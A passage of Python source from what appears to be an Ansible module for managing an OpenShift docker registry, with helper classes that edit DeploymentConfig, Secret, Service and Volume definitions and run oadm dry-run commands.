        self.namespace = namespace
        self._options = options

    @property
    def config_options(self):
        ''' return config options '''
        return self._options

    def to_option_list(self, ascommalist=''):
        '''return all options as a string
           if ascommalist is set to the name of a key, and
           the value of that key is a dict, format the dict
           as a list of comma delimited key=value pairs'''
        return self.stringify(ascommalist)

    def stringify(self, ascommalist=''):
        ''' return the options hash as cli params in a string
            if ascommalist is set to the name of a key, and
            the value of that key is a dict, format the dict
            as a list of comma delimited key=value pairs '''
        params = []
        for name in sorted(self.config_options.keys()):
            option = self.config_options[name]
            # skip options marked excluded
            if not option['include']:
                continue
            # 0 and False are ints and still emitted; '' and None are not
            if not (option['value'] or isinstance(option['value'], int)):
                continue
            if name == ascommalist:
                rendered = ','.join(['{}={}'.format(kk, vv)
                                     for kk, vv in sorted(option['value'].items())])
            else:
                rendered = option['value']
            params.append('--{}={}'.format(name.replace('_', '-'), rendered))

        return params


# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-


# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
    ''' Class to model an openshift DeploymentConfig'''
    default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
  name: default_dc
  namespace: default
spec:
  replicas: 0
  selector:
    default_dc: default_dc
  strategy:
    resources: {}
    rollingParams:
      intervalSeconds: 1
      maxSurge: 0
      maxUnavailable: 25%
      timeoutSeconds: 600
      updatePercent: -25
      updatePeriodSeconds: 1
    type: Rolling
  template:
    metadata:
    spec:
      containers:
      - env:
        - name: default
          value: default
        image: default
        imagePullPolicy: IfNotPresent
        name: default_dc
        ports:
        - containerPort: 8000
          hostPort: 8000
          protocol: TCP
          name: default_port
        resources: {}
        terminationMessagePath: /dev/termination-log
      dnsPolicy: ClusterFirst
      hostNetwork: true
      nodeSelector:
        type: compute
      restartPolicy: Always
      securityContext: {}
      serviceAccount: default
      serviceAccountName: default
      terminationGracePeriodSeconds: 30
  triggers:
  - type: ConfigChange
'''

    # yedit dotted paths into the deploymentconfig document
    replicas_path = "spec.replicas"
    env_path = "spec.template.spec.containers[0].env"
    volumes_path = "spec.template.spec.volumes"
    container_path = "spec.template.spec.containers"
    volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"

    def __init__(self, content=None):
        ''' Constructor for deploymentconfig; falls back to the default document '''
        if not content:
            content = DeploymentConfig.default_deployment_config

        super(DeploymentConfig, self).__init__(content=content)

    def add_env_value(self, key, value):
        ''' add a name/value pair to the first container's env array

            Returns True on success.
        '''
        rval = False
        env = self.get_env_vars()
        if env:
            env.append({'name': key, 'value': value})
            rval = True
        else:
            # no env array yet: create it with this single entry
            result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
            rval = result[0]

        return rval

    def exists_env_value(self, key, value):
        ''' return whether an exact name/value env pair exists '''
        results = self.get_env_vars()
        if not results:
            return False

        # NOTE(review): assumes every env entry has a 'value' key; entries
        # using valueFrom would raise KeyError here -- confirm against callers.
        for result in results:
            if result['name'] == key and result['value'] == value:
                return True

        return False

    def exists_env_key(self, key):
        ''' return whether an env var with the given name exists '''
        results = self.get_env_vars()
        if not results:
            return False

        for result in results:
            if result['name'] == key:
                return True

        return False

    def get_env_var(self, key):
        '''return the env var entry with the given name, or None'''
        results = self.get(DeploymentConfig.env_path) or []
        if not results:
            return None

        for env_var in results:
            if env_var['name'] == key:
                return env_var

        return None

    def get_env_vars(self):
        '''return the env var array of the first container ([] when absent)'''
        return self.get(DeploymentConfig.env_path) or []

    def delete_env_var(self, keys):
        '''delete env vars by name; accepts a single key or a list of keys

           Returns True if anything was removed.
        '''
        if not isinstance(keys, list):
            keys = [keys]

        env_vars_array = self.get_env_vars()
        modified = False
        for key in keys:
            # BUG FIX: idx is reset for every key and compared with
            # `is not None`; previously a match at index 0 was ignored
            # (`if idx:` is falsy for 0) and a stale index from a prior
            # key could delete the wrong entry.
            idx = None
            for env_idx, env_var in enumerate(env_vars_array):
                if env_var['name'] == key:
                    idx = env_idx
                    break

            if idx is not None:
                modified = True
                del env_vars_array[idx]

        return modified

    def update_env_var(self, key, value):
        '''set an env var's value in place, adding it when missing; returns True'''

        env_vars_array = self.get_env_vars()
        idx = None
        for env_idx, env_var in enumerate(env_vars_array):
            if env_var['name'] == key:
                idx = env_idx
                break

        # BUG FIX: compare with `is not None`; a match at index 0 previously
        # fell through to add_env_value and created a duplicate entry.
        if idx is not None:
            env_vars_array[idx]['value'] = value
        else:
            self.add_env_value(key, value)

        return True

    def exists_volume_mount(self, volume_mount):
        ''' return whether a volume mount with the same name exists '''
        exist_volume_mounts = self.get_volume_mounts()

        if not exist_volume_mounts:
            return False

        volume_mount_found = False
        for exist_volume_mount in exist_volume_mounts:
            if exist_volume_mount['name'] == volume_mount['name']:
                volume_mount_found = True
                break

        return volume_mount_found

    def exists_volume(self, volume):
        ''' return whether a volume with the same name exists '''
        exist_volumes = self.get_volumes()

        volume_found = False
        for exist_volume in exist_volumes:
            if exist_volume['name'] == volume['name']:
                volume_found = True
                break

        return volume_found

    def find_volume_by_name(self, volume, mounts=False):
        ''' return the existing volume (or volume mount when mounts=True)
            whose name matches, or None '''
        volumes = []
        if mounts:
            volumes = self.get_volume_mounts()
        else:
            volumes = self.get_volumes()
        for exist_volume in volumes:
            if exist_volume['name'] == volume['name']:
                return exist_volume

        return None

    def get_replicas(self):
        ''' return the spec.replicas setting '''
        return self.get(DeploymentConfig.replicas_path)

    def get_volume_mounts(self):
        '''return the first container's volumeMounts ([] when absent)'''
        return self.get_volumes(mounts=True)

    def get_volumes(self, mounts=False):
        '''return the pod volumes, or the first container's volumeMounts
           when mounts=True ([] when absent)'''
        if mounts:
            return self.get(DeploymentConfig.volume_mounts_path) or []

        return self.get(DeploymentConfig.volumes_path) or []

    def delete_volume_by_name(self, volume):
        '''delete the volume and its matching volume mount by name

           Returns True if either list was modified.
        '''
        modified = False
        exist_volume_mounts = self.get_volume_mounts()
        exist_volumes = self.get_volumes()
        del_idx = None
        for idx, exist_volume in enumerate(exist_volumes):
            if 'name' in exist_volume and exist_volume['name'] == volume['name']:
                del_idx = idx
                break

        if del_idx is not None:
            del exist_volumes[del_idx]
            modified = True

        del_idx = None
        for idx, exist_volume_mount in enumerate(exist_volume_mounts):
            if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
                del_idx = idx
                break

        if del_idx is not None:
            # BUG FIX: previously deleted exist_volume_mounts[idx] (the loop
            # variable) rather than the recorded del_idx.
            del exist_volume_mounts[del_idx]
            modified = True

        return modified

    def add_volume_mount(self, volume_mount):
        ''' add a volume mount to the first container '''
        exist_volume_mounts = self.get_volume_mounts()

        if not exist_volume_mounts and volume_mount:
            self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
        else:
            exist_volume_mounts.append(volume_mount)

    def add_volume(self, volume):
        ''' add a volume to the pod spec '''
        exist_volumes = self.get_volumes()
        if not volume:
            return

        if not exist_volumes:
            self.put(DeploymentConfig.volumes_path, [volume])
        else:
            exist_volumes.append(volume)

    def update_replicas(self, replicas):
        ''' update the spec.replicas value '''
        self.put(DeploymentConfig.replicas_path, replicas)

    def update_volume(self, volume):
        '''replace the volume with the same name, adding it when missing'''
        exist_volumes = self.get_volumes()

        if not volume:
            return False

        # update the volume
        update_idx = None
        for idx, exist_vol in enumerate(exist_volumes):
            if exist_vol['name'] == volume['name']:
                update_idx = idx
                break

        if update_idx is not None:
            exist_volumes[update_idx] = volume
        else:
            self.add_volume(volume)

        return True

    def update_volume_mount(self, volume_mount):
        '''update the mountPath of the matching volume mount, adding the
           mount when no name match modified anything; returns whether the
           document changed'''
        modified = False

        exist_volume_mounts = self.get_volume_mounts()

        if not volume_mount:
            return False

        # update the volume mount
        for exist_vol_mount in exist_volume_mounts:
            if exist_vol_mount['name'] == volume_mount['name']:
                if 'mountPath' in exist_vol_mount and \
                   str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
                    exist_vol_mount['mountPath'] = volume_mount['mountPath']
                    modified = True
                break

        if not modified:
            # NOTE(review): an existing mount with an identical mountPath also
            # reaches this branch and is appended again -- confirm intended.
            self.add_volume_mount(volume_mount)
            modified = True

        return modified

    def needs_update_volume(self, volume, volume_mount):
        ''' verify whether a volume update is needed

            NOTE(review): assumes a volume with the same name already exists;
            find_volume_by_name returning None would raise TypeError here.
        '''
        exist_volume = self.find_volume_by_name(volume)
        exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
        results = []
        results.append(exist_volume['name'] == volume['name'])

        if 'secret' in volume:
            results.append('secret' in exist_volume)
            results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
            results.append(exist_volume_mount['name'] == volume_mount['name'])
            results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])

        elif 'emptyDir' in volume:
            results.append(exist_volume_mount['name'] == volume['name'])
            results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])

        elif 'persistentVolumeClaim' in volume:
            pvc = 'persistentVolumeClaim'
            results.append(pvc in exist_volume)
            if results[-1]:
                results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])

                if 'claimSize' in volume[pvc]:
                    results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])

        elif 'hostpath' in volume:
            # NOTE(review): volumes built by Volume.create_volume_structure use
            # the key 'hostPath', so this lowercase branch may never match --
            # left unchanged because 'correcting' it would dereference a None
            # volume_mount for hostPath volumes; confirm upstream intent.
            results.append('hostPath' in exist_volume)
            results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])

        return not all(results)

    def needs_update_replicas(self, replicas):
        ''' verify whether a replica update is needed '''
        current_reps = self.get(DeploymentConfig.replicas_path)
        return current_reps != replicas

# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/secret.py -*- -*- -*-

# pylint: disable=too-many-instance-attributes
class SecretConfig(object):
    ''' Handle secret options '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 kubeconfig,
                 secrets=None):
        ''' constructor for handling secret options '''
        self.name = sname
        self.namespace = namespace
        self.kubeconfig = kubeconfig
        self.secrets = secrets
        self.data = {}

        self.create_dict()

    def create_dict(self):
        ''' assemble the v1 Secret resource dict from the configured options '''
        self.data.update({
            'apiVersion': 'v1',
            'kind': 'Secret',
            'metadata': {'name': self.name,
                         'namespace': self.namespace},
            # copy the provided secrets so later mutation does not leak in
            'data': dict(self.secrets) if self.secrets else {},
        })

# pylint: disable=too-many-instance-attributes
class Secret(Yedit):
    ''' Class to wrap the oc command line tools '''
    secret_path = "data"
    kind = 'secret'

    def __init__(self, content):
        '''secret constructor'''
        super(Secret, self).__init__(content=content)
        self._secrets = None

    @property
    def secrets(self):
        '''secret property getter; lazily loads the data section'''
        if self._secrets is None:
            self._secrets = self.get_secrets()
        return self._secrets

    @secrets.setter
    def secrets(self, value):
        '''secret property setter

        BUG FIX: the setter previously took no value argument and duplicated
        the getter body, so any assignment to .secrets raised TypeError.
        '''
        self._secrets = value

    def get_secrets(self):
        ''' returns all of the defined secrets ({} when the data section is absent) '''
        return self.get(Secret.secret_path) or {}

    def add_secret(self, key, value):
        ''' add a secret; creates the data section on first use. Returns True. '''
        if self.secrets:
            self.secrets[key] = value
        else:
            self.put(Secret.secret_path, {key: value})

        return True

    def delete_secret(self, key):
        ''' delete a secret; returns False when the key is absent '''
        try:
            del self.secrets[key]
        except KeyError:
            return False

        return True

    def find_secret(self, key):
        ''' find a secret; returns {'key': ..., 'value': ...} or None '''
        try:
            rval = self.secrets[key]
        except KeyError:
            return None

        return {'key': key, 'value': rval}

    def update_secret(self, key, value):
        ''' update a secret's value, adding it when missing. Returns True. '''
        if key in self.secrets:
            self.secrets[key] = value
        else:
            self.add_secret(key, value)

        return True

# -*- -*- -*- End included fragment: lib/secret.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/service.py -*- -*- -*-


# pylint: disable=too-many-instance-attributes
class ServiceConfig(object):
    ''' Handle service options '''
    # pylint: disable=too-many-arguments
    def __init__(self,
                 sname,
                 namespace,
                 ports,
                 selector=None,
                 labels=None,
                 cluster_ip=None,
                 portal_ip=None,
                 session_affinity=None,
                 service_type=None,
                 external_ips=None):
        ''' constructor for handling service options '''
        self.name = sname
        self.namespace = namespace
        self.ports = ports
        self.selector = selector
        self.labels = labels
        self.cluster_ip = cluster_ip
        self.portal_ip = portal_ip
        self.session_affinity = session_affinity
        self.service_type = service_type
        self.external_ips = external_ips
        self.data = {}

        self.create_dict()

    def create_dict(self):
        ''' assemble the v1 Service resource dict from the configured options '''
        metadata = {'name': self.name,
                    'namespace': self.namespace}
        if self.labels:
            # copy the labels so later mutation of self.labels does not leak in
            metadata['labels'] = dict(self.labels)

        spec = {}
        spec['ports'] = self.ports or []
        if self.selector:
            spec['selector'] = self.selector
        # kube defaults sessionAffinity to the string 'None'
        spec['sessionAffinity'] = self.session_affinity or 'None'
        if self.cluster_ip:
            spec['clusterIP'] = self.cluster_ip
        if self.portal_ip:
            spec['portalIP'] = self.portal_ip
        if self.service_type:
            spec['type'] = self.service_type
        if self.external_ips:
            spec['externalIPs'] = self.external_ips

        self.data.update({'apiVersion': 'v1',
                          'kind': 'Service',
                          'metadata': metadata,
                          'spec': spec})


# pylint: disable=too-many-instance-attributes,too-many-public-methods
class Service(Yedit):
    ''' Class to model the oc service object '''
    port_path = "spec.ports"
    portal_ip = "spec.portalIP"
    cluster_ip = "spec.clusterIP"
    selector_path = 'spec.selector'
    kind = 'Service'
    external_ips = "spec.externalIPs"

    def __init__(self, content):
        '''Service constructor'''
        super(Service, self).__init__(content=content)

    def get_ports(self):
        '''return the list of ports ([] when none are defined)'''
        return self.get(Service.port_path) or []

    def get_selector(self):
        '''return the service selector dict ({} when none is defined)'''
        return self.get(Service.selector_path) or {}

    def add_ports(self, inc_ports):
        '''append a port dict (or a list of them) to spec.ports; returns True'''
        if not isinstance(inc_ports, list):
            inc_ports = [inc_ports]

        existing = self.get_ports()
        if existing:
            existing.extend(inc_ports)
        else:
            # no ports yet: create the list from scratch
            self.put(Service.port_path, inc_ports)

        return True

    def find_ports(self, inc_port):
        '''return the first port whose 'port' number matches, else None'''
        return next((port for port in self.get_ports()
                     if port['port'] == inc_port['port']), None)

    def delete_ports(self, inc_ports):
        '''remove the given port(s) from spec.ports

           Returns True when the list was already empty, otherwise True
           only if something was removed.'''
        if not isinstance(inc_ports, list):
            inc_ports = [inc_ports]

        current = self.get(Service.port_path) or []
        if not current:
            return True

        removed = False
        for wanted in inc_ports:
            match = self.find_ports(wanted)
            if match:
                current.remove(match)
                removed = True

        return removed

    def add_cluster_ip(self, sip):
        '''set spec.clusterIP'''
        self.put(Service.cluster_ip, sip)

    def add_portal_ip(self, pip):
        '''set spec.portalIP'''
        self.put(Service.portal_ip, pip)

    def get_external_ips(self):
        '''return the externalIPs list ([] when none are defined)'''
        return self.get(Service.external_ips) or []

    def add_external_ips(self, inc_external_ips):
        '''append an external IP (or a list of them) to spec.externalIPs; returns True'''
        if not isinstance(inc_external_ips, list):
            inc_external_ips = [inc_external_ips]

        existing = self.get_external_ips()
        if existing:
            existing.extend(inc_external_ips)
        else:
            self.put(Service.external_ips, inc_external_ips)

        return True

    def find_external_ips(self, inc_external_ip):
        '''return the first stored external IP equal to inc_external_ip, else None'''
        for candidate in self.get_external_ips():
            if candidate == inc_external_ip:
                return candidate

        return None

    def delete_external_ips(self, inc_external_ips):
        '''remove the given external IP(s) from spec.externalIPs

           Returns True when the list was already empty, otherwise True
           only if something was removed.'''
        if not isinstance(inc_external_ips, list):
            inc_external_ips = [inc_external_ips]

        current = self.get(Service.external_ips) or []
        if not current:
            return True

        removed = False
        for wanted in inc_external_ips:
            match = self.find_external_ips(wanted)
            if match:
                current.remove(match)
                removed = True

        return removed

# -*- -*- -*- End included fragment: lib/service.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: lib/volume.py -*- -*- -*-

class Volume(object):
    ''' Class to represent an openshift volume object'''
    # yedit paths to volumeMounts / volumes per resource kind
    volume_mounts_path = {"pod": "spec.containers[0].volumeMounts",
                          "dc":  "spec.template.spec.containers[0].volumeMounts",
                          "rc":  "spec.template.spec.containers[0].volumeMounts",
                         }
    volumes_path = {"pod": "spec.volumes",
                    "dc":  "spec.template.spec.volumes",
                    "rc":  "spec.template.spec.volumes",
                   }

    @staticmethod
    def create_volume_structure(volume_info):
        ''' return a properly structured (volume, volume_mount) pair

            volume_mount is None for pvc and hostPath volume types, which
            have no container mount built here.
        '''
        volume_mount = None
        volume = {'name': volume_info['name']}
        volume_type = volume_info['type'].lower()
        if volume_type == 'secret':
            # BUG FIX: previously keyed the dict on the raw volume_info['type']
            # (case-sensitive) after lowering it for comparison, which left
            # volume['secret'] as {} for inputs like 'Secret'.
            volume['secret'] = {'secretName': volume_info['secret_name']}
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}
        elif volume_type == 'emptydir':
            volume['emptyDir'] = {}
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}
        elif volume_type == 'pvc' or volume_type == 'persistentvolumeclaim':
            volume['persistentVolumeClaim'] = {}
            volume['persistentVolumeClaim']['claimName'] = volume_info['claimName']
            volume['persistentVolumeClaim']['claimSize'] = volume_info['claimSize']
        elif volume_type == 'hostpath':
            volume['hostPath'] = {}
            volume['hostPath']['path'] = volume_info['path']
        elif volume_type == 'configmap':
            volume['configMap'] = {}
            volume['configMap']['name'] = volume_info['configmap_name']
            volume_mount = {'mountPath': volume_info['path'],
                            'name': volume_info['name']}

        return (volume, volume_mount)

# -*- -*- -*- End included fragment: lib/volume.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: class/oc_version.py -*- -*- -*-


# pylint: disable=too-many-instance-attributes
class OCVersion(OpenShiftCLI):
    ''' Class to wrap the oc command line tools '''
    # pylint allows 5
    # pylint: disable=too-many-arguments
    def __init__(self,
                 config,
                 debug):
        ''' Constructor for OCVersion '''
        super(OCVersion, self).__init__(None, config)
        self.debug = debug

    def get(self):
        '''get and return version information

           Raises OpenShiftCLIError when the underlying command fails.'''
        raw = self._version()
        if raw['returncode'] != 0:
            raise OpenShiftCLIError('Problem detecting openshift version.')

        filtered_vers = Utils.filter_versions(raw['results'])

        version_info = {'returncode': raw['returncode']}
        version_info.update(filtered_vers)
        version_info.update(Utils.add_custom_versions(filtered_vers))

        return version_info

    @staticmethod
    def run_ansible(params):
        '''run the idempotent ansible code'''
        oc_version = OCVersion(params['kubeconfig'], params['debug'])

        if params['state'] != 'list':
            # mirror the original behavior: nothing returned for other states
            return None

        #pylint: disable=protected-access
        return {'state': params['state'],
                'results': oc_version.get(),
                'changed': False}

# -*- -*- -*- End included fragment: class/oc_version.py -*- -*- -*-

# -*- -*- -*- Begin included fragment: class/oc_adm_registry.py -*- -*- -*-

class RegistryException(Exception):
    '''Raised when a registry operation cannot be completed.'''


class RegistryConfig(OpenShiftCLIConfig):
    ''' RegistryConfig is a DTO for the registry. '''

    def __init__(self, rname, namespace, kubeconfig, registry_options):
        '''Forward all settings straight to the generic OpenShiftCLIConfig.'''
        OpenShiftCLIConfig.__init__(self, rname, namespace, kubeconfig, registry_options)


class Registry(OpenShiftCLI):
    ''' Class to wrap the oc command line tools '''

    volume_mount_path = 'spec.template.spec.containers[0].volumeMounts'
    volume_path = 'spec.template.spec.volumes'
    env_path = 'spec.template.spec.containers[0].env'

    def __init__(self,
                 registry_config,
                 verbose=False):
        ''' Constructor for Registry

           a registry consists of 3 or more parts
           - dc/docker-registry
           - svc/docker-registry

           Parameters:
           :registry_config: RegistryConfig DTO describing the desired registry
           :verbose: passed through to the oc wrapper for extra output
        '''
        super(Registry, self).__init__(registry_config.namespace, registry_config.kubeconfig, verbose)
        self.version = OCVersion(registry_config.kubeconfig, verbose)
        # svc_ip/portal_ip are captured from a live service during update()
        # so a replace does not change the addresses
        self.svc_ip = None
        self.portal_ip = None
        self.config = registry_config
        self.verbose = verbose
        # the registry is realized as a deploymentconfig plus a service,
        # both sharing the configured name
        self.registry_parts = [{'kind': 'dc', 'name': self.config.name},
                               {'kind': 'svc', 'name': self.config.name},
                              ]

        self.__prepared_registry = None
        self.volume_mounts = []
        self.volumes = []
        if self.config.config_options['volume_mounts']['value']:
            for volume in self.config.config_options['volume_mounts']['value']:
                # normalize the ansible option keys into the shape expected
                # by Volume.create_volume_structure
                volume_info = {'secret_name': volume.get('secret_name', None),
                               'name':        volume.get('name', None),
                               'type':        volume.get('type', None),
                               'path':        volume.get('path', None),
                               'claimName':   volume.get('claim_name', None),
                               'claimSize':   volume.get('claim_size', None),
                              }

                # NOTE(review): vol_mount is None for pvc/hostPath volume types
                # and is appended anyway; DeploymentConfig.update_volume_mount
                # guards against None entries -- confirm other consumers do too.
                vol, vol_mount = Volume.create_volume_structure(volume_info)
                self.volumes.append(vol)
                self.volume_mounts.append(vol_mount)

        self.dconfig = None
        self.svc = None

    @property
    def deploymentconfig(self):
        ''' the DeploymentConfig loaded by get(), or None when not fetched/found '''
        return self.dconfig

    @deploymentconfig.setter
    def deploymentconfig(self, config):
        ''' setter for the deploymentconfig property '''
        self.dconfig = config

    @property
    def service(self):
        ''' the Service loaded by get(), or None when not fetched/found '''
        return self.svc

    @service.setter
    def service(self, config):
        ''' setter for the service property '''
        self.svc = config

    @property
    def prepared_registry(self):
        ''' lazily build and cache the registry preparation results

            Raises RegistryException when preparation fails.'''
        if self.__prepared_registry:
            return self.__prepared_registry

        prep = self.prepare_registry()
        if not prep or ('returncode' in prep and prep['returncode'] != 0):
            raise RegistryException('Could not perform registry preparation. {}'.format(prep))
        self.__prepared_registry = prep

        return self.__prepared_registry

    @prepared_registry.setter
    def prepared_registry(self, data):
        ''' setter method for the prepared_registry cache '''
        self.__prepared_registry = data

    def get(self):
        ''' fetch the dc and svc registry parts and record them on self

            Returns the last non-zero returncode (0 when all parts loaded).'''
        self.deploymentconfig = None
        self.service = None

        returncode = 0
        for part in self.registry_parts:
            result = self._get(part['kind'], name=part['name'])
            if result['returncode'] != 0:
                returncode = result['returncode']
            elif part['kind'] == 'dc':
                self.deploymentconfig = DeploymentConfig(result['results'][0])
            elif part['kind'] == 'svc':
                self.service = Service(result['results'][0])

        return {'returncode': returncode,
                'deploymentconfig': self.deploymentconfig,
                'service': self.service}

    def exists(self):
        '''does the registry exist? True only when both dc and svc were loaded'''
        return bool(self.deploymentconfig and self.service)

    def delete(self, complete=True):
        '''delete the registry parts; the service is kept when complete=False'''
        parts = []
        for part in self.registry_parts:
            if complete or part['kind'] != 'svc':
                parts.append(self._delete(part['kind'], part['name']))

        # surface the last non-zero returncode from the individual deletes
        rval = 0
        for outcome in parts:
            # pylint: disable=invalid-sequence-index
            if outcome.get('returncode', 0) != 0:
                rval = outcome['returncode']

        return {'returncode': rval, 'results': parts}

    def prepare_registry(self):
        ''' prepare a registry for instantiation

            Runs `oadm registry --dry-run -o json` with the configured
            options, splits the result into Service and DeploymentConfig,
            applies local modifications, and writes both to temp files.
        '''
        # 'labels' is rendered as comma-delimited key=value pairs for the CLI
        options = self.config.to_option_list(ascommalist='labels')

        cmd = ['registry']
        cmd.extend(options)
        cmd.extend(['--dry-run=True', '-o', 'json'])

        results = self.openshift_cmd(cmd, oadm=True, output=True, output_type='json')
        # probably need to parse this
        # pylint thinks results is a string
        # pylint: disable=no-member
        # NOTE(review): `and` means a failed command with an 'items' payload
        # still proceeds -- confirm `or` was not intended here.
        if results['returncode'] != 0 and 'items' not in results['results']:
            raise RegistryException('Could not perform registry preparation. {}'.format(results))

        service = None
        deploymentconfig = None
        # pylint: disable=invalid-sequence-index
        for res in results['results']['items']:
            if res['kind'] == 'DeploymentConfig':
                deploymentconfig = DeploymentConfig(res)
            elif res['kind'] == 'Service':
                service = Service(res)

        # Verify we got a service and a deploymentconfig
        if not service or not deploymentconfig:
            return results

        # results will need to get parsed here and modifications added
        deploymentconfig = DeploymentConfig(self.add_modifications(deploymentconfig))

        # modify service ip: reuse addresses captured from the live service
        if self.svc_ip:
            service.put('spec.clusterIP', self.svc_ip)
        if self.portal_ip:
            service.put('spec.portalIP', self.portal_ip)

        # the dry-run doesn't apply the selector correctly
        if self.service:
            service.put('spec.selector', self.service.get_selector())

        # need to create the service and the deploymentconfig
        service_file = Utils.create_tmp_file_from_contents('service', service.yaml_dict)
        deployment_file = Utils.create_tmp_file_from_contents('deploymentconfig', deploymentconfig.yaml_dict)

        # *_update flags start False; needs_update() (defined below) flips them
        return {"service": service,
                "service_file": service_file,
                "service_update": False,
                "deployment": deploymentconfig,
                "deployment_file": deployment_file,
                "deployment_update": False}

    def create(self):
        '''Create a registry: create missing parts, replace parts flagged
           for update, and aggregate the returncodes.'''
        self.needs_update()

        results = []
        prepared = self.prepared_registry
        # (current object, prepared file key, update flag key) per part
        for current, file_key, update_key in (
                (self.deploymentconfig, 'deployment_file', 'deployment_update'),
                (self.service, 'service_file', 'service_update')):
            if current is None:
                results.append(self._create(prepared[file_key]))
            elif prepared[update_key]:
                results.append(self._replace(prepared[file_key]))

        # surface the last non-zero returncode
        rval = 0
        for outcome in results:
            # pylint: disable=invalid-sequence-index
            if outcome.get('returncode', 0) != 0:
                rval = outcome['returncode']

        return {'returncode': rval, 'results': results}

    def update(self):
        '''run update for the registry.  This performs a replace if required'''
        # capture the live service IPs first so the lazy prepare_registry
        # (triggered below via the prepared_registry property) reuses them
        if self.service:
            for attr, path in (('svc_ip', 'spec.clusterIP'),
                               ('portal_ip', 'spec.portalIP')):
                current = self.service.get(path)
                if current:
                    setattr(self, attr, current)

        prepared = self.prepared_registry
        results = []
        if prepared['deployment_update']:
            results.append(self._replace(prepared['deployment_file']))
        if prepared['service_update']:
            results.append(self._replace(prepared['service_file']))

        # surface the last non-zero returncode
        rval = 0
        for outcome in results:
            if outcome['returncode'] != 0:
                rval = outcome['returncode']

        return {'returncode': rval, 'results': results}

    def add_modifications(self, deploymentconfig):
        ''' update a deployment config with changes

        Applies the configured env vars, volumes, volume mounts and edits to
        the passed deploymentconfig.  Returns the modified yaml_dict, or None
        when edits were requested but none of them changed anything.
        '''
        # The environment variable for REGISTRY_HTTP_SECRET is autogenerated
        # We should set the generated deploymentconfig to the in memory version
        # the following modifications will overwrite if needed
        if self.deploymentconfig:
            result = self.deploymentconfig.get_env_var('REGISTRY_HTTP_SECRET')
            if result:
                deploymentconfig.update_env_var('REGISTRY_HTTP_SECRET', result['value'])

        # Currently we know that our deployment of a registry requires a few extra modifications
        # Modification 1
        # we need specific environment variables to be set
        for key, value in self.config.config_options['env_vars'].get('value', {}).items():
            if not deploymentconfig.exists_env_key(key):
                deploymentconfig.add_env_value(key, value)
            else:
                deploymentconfig.update_env_var(key, value)

        # Modification 2
        # we need specific volume variables to be set
        for volume in self.volumes:
            deploymentconfig.update_volume(volume)

        for vol_mount in self.volume_mounts:
            deploymentconfig.update_volume_mount(vol_mount)

        # Modification 3
        # Edits
        edit_results = []
        for edit in self.config.config_options['edits'].get('value', []):
            if edit['action'] == 'put':
                edit_results.append(deploymentconfig.put(edit['key'],
                                                         edit['value']))
            if edit['action'] == 'update':
                edit_results.append(deploymentconfig.update(edit['key'],
                                                            edit['value'],
                                                            edit.get('index', None),
                                                            edit.get('curr_value', None)))
            if edit['action'] == 'append':
                edit_results.append(deploymentconfig.append(edit['key'],
                                                            edit['value']))

        # NOTE(review): res[0] is treated as a "changed" flag from each edit
        # helper; if edits were attempted and none reported a change, return
        # None to signal "nothing to update" to the caller.
        if edit_results and not any([res[0] for res in edit_results]):
            return None

        return deploymentconfig.yaml_dict

    def needs_update(self):
        ''' check to see if we need to update '''
        # The service comparison ignores fields the cluster fills in on its
        # own; they would never match the locally prepared definition.
        service_ignore = ['clusterIP', 'portalIP', 'type', 'protocol']
        service_matches = self.service is not None and \
            Utils.check_def_equal(self.prepared_registry['service'].yaml_dict,
                                  self.service.yaml_dict,
                                  service_ignore,
                                  debug=self.verbose)
        if not service_matches:
            self.prepared_registry['service_update'] = True

        # Likewise ignore deploymentconfig fields that are defaulted or
        # auto-populated by the server.
        deployment_ignore = ['dnsPolicy',
                             'terminationGracePeriodSeconds',
                             'restartPolicy', 'timeoutSeconds',
                             'livenessProbe', 'readinessProbe',
                             'terminationMessagePath',
                             'securityContext',
                             'imagePullPolicy',
                             'protocol',  # ports.protocol: TCP
                             'type',  # strategy: {'type': 'rolling'}
                             'defaultMode',  # added on secrets
                             'activeDeadlineSeconds',  # added in 1.5 for timeouts
                            ]

        deployment_matches = self.deploymentconfig is not None and \
            Utils.check_def_equal(self.prepared_registry['deployment'].yaml_dict,
                                  self.deploymentconfig.yaml_dict,
                                  deployment_ignore,
                                  debug=self.verbose)
        if not deployment_matches:
            self.prepared_registry['deployment_update'] = True

        return self.prepared_registry['deployment_update'] or self.prepared_registry['service_update'] or False

    # In the future, we would like to break out each ansible state into a function.
    # pylint: disable=too-many-branches,too-many-return-statements
    @staticmethod
    def run_ansible(params, check_mode):
        '''run idempotent ansible code

        params: the ansible module parameters (see main()).
        check_mode: when True, report what would change without changing it.
        Returns a dict following ansible result conventions
        ('changed', 'failed', 'results', 'state', 'msg').
        '''

        # NOTE(review): the 'include' flag appears to control whether an
        # option is passed through on the oc command line; its semantics are
        # defined by RegistryConfig elsewhere -- confirm.
        registry_options = {'images': {'value': params['images'], 'include': True},
                            'latest_images': {'value': params['latest_images'], 'include': True},
                            'labels': {'value': params['labels'], 'include': True},
                            'ports': {'value': ','.join(params['ports']), 'include': True},
                            'replicas': {'value': params['replicas'], 'include': True},
                            'selector': {'value': params['selector'], 'include': True},
                            'service_account': {'value': params['service_account'], 'include': True},
